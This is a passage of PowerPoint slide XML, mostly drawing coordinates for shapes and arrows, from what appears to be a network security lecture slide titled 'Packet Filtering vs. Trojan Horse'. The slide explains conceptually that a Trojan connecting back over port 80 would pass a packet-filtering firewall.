                    <a:pt x="429941" y="657513"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429941" y="664836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="470321" y="657513"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="701190" y="597833"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="693996" y="599138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693996" y="606459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="701190" y="597833"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="711499" y="597833"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="701190" y="597833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693996" y="606459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711499" y="606459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711499" y="597833"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="693996" y="25716"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="693996" y="599138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="701190" y="597833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711499" y="597833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711499" y="27889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="699577" y="27889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693996" y="25716"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="17502" y="127162"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="10275" y="135788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17502" y="134507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17502" y="127162"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="17502" y="134507"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="10275" y="135788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17502" y="135788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17502" y="134507"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="58959" y="127162"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="17502" y="127162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17502" y="134507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58959" y="127162"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="693996" y="19720"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="693996" y="25716"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="699577" y="27889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693996" y="19720"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="711499" y="19720"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="693996" y="19720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="699577" y="27889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711499" y="27889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711499" y="19720"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="711499" y="17221"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="672182" y="17221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676880" y="17678"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="674458" y="18107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693996" y="25716"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693996" y="19720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711499" y="19720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711499" y="17221"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="672182" y="17221"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="674458" y="18107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676880" y="17678"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="672182" y="17221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61" name="object 57">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C50A221E-C010-C6AD-AABF-8B1B7864B6E6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2508" y="3847360"/>
              <a:ext cx="526589" cy="537970"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62" name="object 58">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00792143-734E-48B4-9D50-64713A352FEA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2589906" y="3421870"/>
              <a:ext cx="2054860" cy="878840"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2054860" h="878839">
                  <a:moveTo>
                    <a:pt x="2049737" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="867154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4754" y="878391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2054492" y="11236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2049737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3" name="object 59">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DF6AEB2-EF8E-4145-9A43-B884EA89E213}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3664458" y="3173730"/>
              <a:ext cx="937260" cy="288290"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="937260" h="288289">
                  <a:moveTo>
                    <a:pt x="793241" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="793241" y="72008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="72008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="216026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="793241" y="216026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="793241" y="288036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="937259" y="144018"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="793241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4" name="object 60">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45E7828B-ABD9-5E89-9710-D683E621AD69}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3664458" y="3173730"/>
              <a:ext cx="937260" cy="288290"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="937260" h="288289">
                  <a:moveTo>
                    <a:pt x="0" y="72008"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="793241" y="72008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="793241" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="937259" y="144018"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="793241" y="288036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="793241" y="216026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="216026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="72008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5" name="object 61">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05B91156-497A-5817-7F11-AF5B3E66F98B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4232529" y="2752725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336550" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="222123" y="114426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107696" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="107695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114426" y="222123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="336550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107696" y="444245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222123" y="329819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="336550" y="444245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="444246" y="336550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="329819" y="222123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="444246" y="107695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6" name="object 62">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0CD7B36-8509-0120-1973-24EECD33C258}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4232529" y="2752725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107695"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="107696" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222123" y="114426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="336550" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="444246" y="107695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="329819" y="222123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="444246" y="336550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="336550" y="444245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222123" y="329819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107696" y="444245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="336550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114426" y="222123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="107695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63">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7DAB720-9CD5-650F-26C3-A1D91E99E0D2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8" name="object 64">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5AF641B-6379-09E0-A428-3C74D05855DB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107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16110014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A567982-73DE-1010-3915-A37D9A692691}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="445605" y="4730295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F69B62B-CCE8-B0BA-30F1-1E01A9EBB613}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533031" y="185345"/>
            <a:ext cx="676719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Packet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Filtering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vs.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Trojan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Horse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82E1502-46A6-248E-441F-FFCC4EDA1710}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5232108" y="4766534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577ACB7-6067-D3A3-BE09-D6B7DD7B3954}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5232108" y="4777180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108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A935677-1A78-14F0-319F-6B1254AE1496}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532422" y="2181532"/>
            <a:ext cx="8051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What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happens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if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hacker,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who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smart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knows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all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well-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known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ports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heart,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configures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Trojan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connect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back</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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his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her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machine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80?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477442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065D299-D644-5C04-9363-FC5816532C21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Packet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Filtering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vs.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Trojan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Horse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0D90645-9E8D-00F5-2864-8505B6B9B124}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532422" y="1300595"/>
            <a:ext cx="5097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firewall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allow</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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connection!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C7A173E4-B835-BDB0-0318-6B19173C8241}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="796886" y="2117759"/>
            <a:ext cx="7776150" cy="2717800"/>
            <a:chOff x="675131" y="2116881"/>
            <a:chExt cx="7776150" cy="2717800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B74D0362-F142-C408-A048-0FE5F91BEDB2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3708654" y="3220974"/>
              <a:ext cx="3599815" cy="288290"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3599815" h="288289">
                  <a:moveTo>
                    <a:pt x="3455670" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3455670" y="72008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="72008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="216026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3455670" y="216026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3455670" y="288036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3599688" y="144018"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3455670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DB14066D-5400-B7EE-2ACF-4C51E8509147}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3708654" y="3220974"/>
              <a:ext cx="3599815" cy="288290"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3599815" h="288289">
                  <a:moveTo>
                    <a:pt x="0" y="72008"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3455670" y="72008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3455670" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3599688" y="144018"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3455670" y="288036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3455670" y="216026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="216026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="72008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1B013C46-93F8-B06F-B5EC-6E6D5505AD2C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="704620" y="2144730"/>
              <a:ext cx="4138929" cy="2660650"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4138929" h="2660650">
                  <a:moveTo>
                    <a:pt x="1734987" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1607198" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1538388" y="9834"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1469578" y="29504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1440088" y="39339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1405684" y="49174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1312299" y="93431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1253319" y="132770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1179595" y="191780"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1130445" y="240954"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1110785" y="270459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1091125" y="295046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1071465" y="324550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1056720" y="349138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1041975" y="378642"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1022315" y="408147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1012485" y="442569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="992825" y="501578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="982995" y="536000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="978080" y="565505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="968250" y="634349"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="968250" y="722863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="938761" y="727780"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="904356" y="732698"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="874866" y="742533"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="840461" y="752368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="815886" y="767120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="786396" y="786790"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="761821" y="801542"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="697927" y="875304"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="653692" y="958900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="643862" y="1017909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="638947" y="1057249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="643862" y="1076919"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="643862" y="1106423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="609457" y="1096588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="570137" y="1086753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="530817" y="1081836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="496412" y="1081836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="442348" y="1086753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="393198" y="1091671"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="344048" y="1106423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="299813" y="1121176"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255578" y="1140845"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176939" y="1190020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142534" y="1219524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108129" y="1253946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83554" y="1288368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34404" y="1367047"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19659" y="1411304"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1499818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1598167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19659" y="1686681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34404" y="1730938"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83554" y="1809617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108129" y="1844039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142534" y="1878461"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176939" y="1907966"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216259" y="1932553"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255578" y="1962058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="299813" y="1976810"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="344048" y="1996480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="393198" y="2006314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="442348" y="2011232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="496412" y="2016149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525902" y="2016149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="560307" y="2011232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="560307" y="2055489"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="565222" y="2084993"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="565222" y="2114498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="575052" y="2144003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="579967" y="2168590"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="599627" y="2227599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="614372" y="2252186"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="629117" y="2281691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="702842" y="2380040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="771651" y="2443967"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="820801" y="2483306"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="874866" y="2517728"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="933846" y="2547233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="997740" y="2571820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1061635" y="2591490"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1130445" y="2606242"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1169765" y="2611159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1204169" y="2616077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1238574" y="2616077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1277894" y="2620994"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1317214" y="2616077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1356534" y="2616077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1435173" y="2606242"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1474493" y="2596407"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1543303" y="2576737"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1582623" y="2566902"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1612113" y="2552150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1646518" y="2532480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1676007" y="2517728"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1705497" y="2498058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1739902" y="2478389"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1764477" y="2458719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1793967" y="2439049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1818542" y="2414462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1838202" y="2439049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1862777" y="2468554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1887352" y="2488223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1916841" y="2512811"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1946331" y="2532480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1975821" y="2557068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2010226" y="2571820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2049546" y="2591490"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2088866" y="2606242"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2128186" y="2616077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2172420" y="2630829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2260890" y="2650499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2305125" y="2655416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2349360" y="2655416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2398509" y="2660334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2462404" y="2655416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2521384" y="2650499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2580364" y="2640664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2639343" y="2625912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2688493" y="2611159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2742558" y="2591490"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2786793" y="2571820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2835943" y="2547233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2875262" y="2522646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2909667" y="2488223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2944072" y="2458719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2973562" y="2429214"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2998137" y="2389875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3027627" y="2316113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3037457" y="2276774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3062032" y="2281691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3081691" y="2286608"/>
                  </a:lnTo>
                  <a:lnTo>
